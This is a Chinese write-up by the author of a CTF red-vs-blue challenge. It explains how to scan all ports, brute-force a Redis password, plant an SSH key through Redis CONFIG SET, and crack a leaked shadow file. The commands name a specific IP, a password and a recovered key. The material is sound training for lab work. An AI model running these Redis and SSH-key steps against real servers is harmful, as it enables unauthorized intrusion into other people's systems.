信安之路挑战赛红蓝对抗题目全解析

本文作者:Umask(信安之路作者团队成员 / 红蓝对抗题目出题人) 原本红蓝对抗的题目是由红蓝对抗小组的组长来出的,他工作项目比较急没时间,就有作者团队的另外一个小伙伴代替完成题目,并在比赛过程中做一下安全运维,根据攻击情况来做调整。 原创 信安之路红蓝对抗小组招募志同道合的朋友

首先,题目其实设置不是太难,主要是坑有点多,而且需要一定的时间才能完成。因为要本着贴近实战的原则出题,所以在做题的时候,很多人还是带着做传统 CTF 题目的思路来,所以有一些坑就让这部分人钻了牛角尖,出不来。

不要只关注 web,渗透不只有 web 一条路

在搞定 web 前端那个题目之后,会得到一个 key,将这个 key 提交到信安之路公众号后台之后会得到红蓝对抗这个题目的提示,也就是入口地址,拿到 url 之后,我们首先会习惯性的浏览器访问,结果发现有一个网站,网页内容存在二维码福利照片

这里是坑点 1, ctf 做习惯的人有图片以为是隐写术, 有网站以为是考 web 漏洞,后台发现一堆人进行目录扫描。 其实放网站无非是干扰的信息而已,让大家消磨点时间。

其实这次题目设置偏向真实实战类型,所有在真实的渗透测试中,获取到一个 url 或 IP,都应该要先从端口服务开始入手,网站(web)其实只是端口服务中的一个,大家眼中不要只有 web 服务,可能大家都是学 web 安全入门的,所以大家上来就搞 web,应该在搞之前了解一个服务器的基本情况,就是要知道他都开了哪些端口,是干什么用的,所以最好对该服务器做一次全端口扫描,从开放的端口上可以大概看出这个服务器到底是做什么用的,然后对症下药。

后来为了帮大家纠正方向,网站页面进行了提示:key > 1433 + 1521 + 3306

明眼人大家都知道分别为不同的数据库端口,1433(sql server)、 1521(oracle) 、3306(mysql)

提示大家 key 值就藏在比上述三个端口加起来还大的端口上。

寻找突破口

这一关的突破口其实在 redis 这个数据库服务上(端口 6379),首先需要进行 nmap 的端口扫描,才能发现靶机存在的这个端口,这里隐藏坑点 2,正常的 nmap 端口扫描是发现不了的,因为 6379 端口为非常见端口,所以我们需要进行一个全端口的发现。

nmap -p- -sV honglanduikburongyiya.xazlsec.com

大家要有这样的思路,靶机不可能无缘无故的开放某个服务端口,开放的服务端口就是你的突破口。

我这次考的就是 redis 服务,大家平常学习的都是未授权的访问,也就是无密码,这次增加点难度,设置了 top100密码, 大家可以依靠py脚本、工具等方式来爆破。

得到密码后,我们就可以连接上去了。

redis-cli -h honglanduikburongyiya.xazlsec.com -a 1q2w3e4r

现在常规 redis 漏洞利用方式中存在以下几种: 写入 ssh key 、写 webshell、反弹 shell、写 /etc/passwd 具体详情访问:

http://www.freebuf.com/vuls/148758.html

(1)常见写入 ssh key 均为写到 root 目录下的 ssh:

192.168.56.101:6379> CONFIG SETdir /root/.ssh/

但是为了避免大家拿到 root 的权限,我把 .ssh 目录删除了。所以会报错,没有此目录。

(error) ERR Changing directory: Nosuch file or directory

(2)写 webshell,我并未装 php 环境,所以大家的 webshell,就算写入到 /var/www/html/ 底下也是无法执行。

(3)反弹 shell,这种手法是依靠 linux 的定时任务 crontab,但是我把 cron 服务关停了,所以就算写入了定时计划,服务关停也不会触发。

(4)写入 /etc/passwd,具体手法原理,见上述引用文章,这个是我没控制住的,写入 /etc/passwd 需要 root 权限,但是我部署环境的时候忘记以普通用户身份权限启动,导致有同学依靠写入 /etc/passwd 的方式得到了 root 权限。

直捣黄龙

这次的考点是写入 ssh key ,但是是写入到普通用户底下,想看看大家在 root 目录下无法写入的时候是否懂得变通,大家眼里不要只有 root 账户。本次创建了以下 4 个常见用户名,key、admin、guest、test,随便写入其中某个用户即可。

root@bogon:~/.ssh$ ssh-keygen–t rsa  
root@bogon:~/.ssh$ (echo -e"\n\n"; catid_rsa.pub; echo-e"\n\n") > foo.txt  
root@bogon:~/.ssh$ catfoo.txt | redis-cli -h66.42.84.155 -xsetcrackit  
root@bogon:~/.ssh$ redis-cli-h66.42.84.155 -a1q2w3e4r
66.42.84.155:6379> CONFIG setdir /home/test/.ssh/
66.42.84.155:6379> config setdbfilename "authorized_keys" 
66.42.84.155:6379>save![](https://i.imgur.com/Yfmsf5P.png)  

接着即可拿着私钥进行无密钥登陆

root@bogon:~/.ssh# ssh -i id_rsa test@66.42.84.155

拿到权限登陆后,即可登陆寻找 Key 值。这里考验大家寻找线索能力。

我在 /tmp/ 目录下遗留了 history 文件。

该文件中存在几个 tips。

(1)key 的明文密码就是下一关通关密文

有的同学把上面的 key 明文密码误认为 P@ssword123, 但是设置密码非这命令,误导大家而已。

(2)存在的 2 个关键信息,我 wget 一个地址和我备份了一个 /etc/shadow 文件。

我们访问一下,那个 url 看看,是个高频字典的下载页面

而那个 shadow.bak 的文件我们可以读。按照最初的 tips 就是获取 key 的密文密码,那么字典、hash 密文有了剩下的就是爆破了。

我们可以使用 hashcat 工具来爆破,当然也可以选择其他工具

至此,我们成功获得了 Key 的明文密码:1314woaini1314

小插曲

由于所有人攻击的是一套系统,所以每个人都操作了啥不得而知,一个人把系统搞坏,就会导致所有人都不能玩,在实际的环境中渗透,不能破坏计算机的正常使用是第一原则,所以好的渗透师是不会让系统出问题的,你如果让系统出了故障,那么你之前的努力就白费了,因为管理员知道了你的入侵行为,把你清理出去,或者服务器下线,对你来说都是一个沉重的打击,所以更贴近实战的比赛就是大家玩一台机子,而不会让服务器出问题。

由于不知道做了什么操作,导致普通用户不能通过 ssh key 认证登录系统,所以为了让大家正常参加比赛,所以临时安装了 php 的运行环境,大家可以在 web 目录下写 webshell 来继续接下来的比赛,所以大家在做渗透的时候,一定要记住不要让你渗透的设备出问题,否则,你将后悔莫及。

总结

整体题目不难,关键在于坑点较多些,需要足够的耐心来处理和寻找线索。

其实就是在 redis 未授权的访问基础上进行变化,主要考验大家在非常规的渗透测试中的应变能力。

比较渗透测试的工作不是一层不变的,大家要懂得灵活运用。

原文发布于微信公众号 - 信安之路(xazlsec)

原文发表时间:2018-09-25

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏FreeBuf

神话传奇:一款通过卖号在微信群传播的远控木马

近期,360安全卫士监测到了一批通过微信群传播的远控木马,木马针对在网上倒卖微信号的人群定向投放。卖号人的交流群里时常有不同的小号在散播诱导性的木马程序,不知情...

2454
来自专栏生信技能树

我的第一R包- 生信配置文件大全

大家好,我是李剑峰,生信技能树论坛的VIP小编,目前在上海交通大学医学院附属瑞金医院进行研究生阶段的学习,主要研究方向是生物信息学、医学信息学、大数据综合分析、...

3939
来自专栏阮一峰的网络日志

DDOS 攻击的防范教程

7663
来自专栏数据和云

DBA生存警示:防范频发的数据误删除操作

编辑手记:对于资深的老DBA们,他们在漫长的职业生涯中养成了很多稀奇古怪的守则,以在复杂多变的环境中“幸存”,这源于无数血泪的教训,我曾经在《数据安全警示录》...

38514
来自专栏刺客博客

魅蓝Note3降级教程

3.9K6
来自专栏iKcamp

iKcamp|基于Koa2搭建Node.js实战(含视频)☞ 处理静态资源

视频地址:https://www.cctalk.com/v/15114923882788 处理静态资源 无非花开花落,静静。 指定静态资源目录 这里我们使用第...

4837
来自专栏蓝天

Linux下可以替换运行中的程序么?

今天被朋友问及“Linux下可以替换运行中的程序么?”,以前依稀记得Linux下是可以的(而Windows就不让),于是随口答道“OK”。结果朋友发来一个执行结...

1892
来自专栏FreeBuf

SpyDealer深度剖析:一个广泛针对中国手机APP进行信息窃取的恶意软件

随着Android智能手机的普及和各种功能APP的流行,人们已越来越多地依赖智能手机存储处理个人和商务信息,而这也成为了犯罪份子进行信息窃取的隐蔽途径。近日,P...

3544
来自专栏FreeBuf

揭秘“食鼠猫”病毒背后的灰色产业链

“食鼠猫”样本主要通过虚假色情播放器等流氓软件的捆绑安装进行传播,感染主机会被强制安装多款推广软件,病毒通过篡改浏览器快捷方式、Hosts文件等方式劫持用户电脑...

2647
来自专栏FreeBuf

Wifi密码破解实战

声明:此文章仅供研究学习和技术交流,请勿用于破解他人 WIFI 密码!如果你有这些时间和精力,完全可以新买一坨无线路由器,何必蹭别人家的无线网!!!! 前言 网...

1.2K9

扫码关注云+社区

领取腾讯云代金券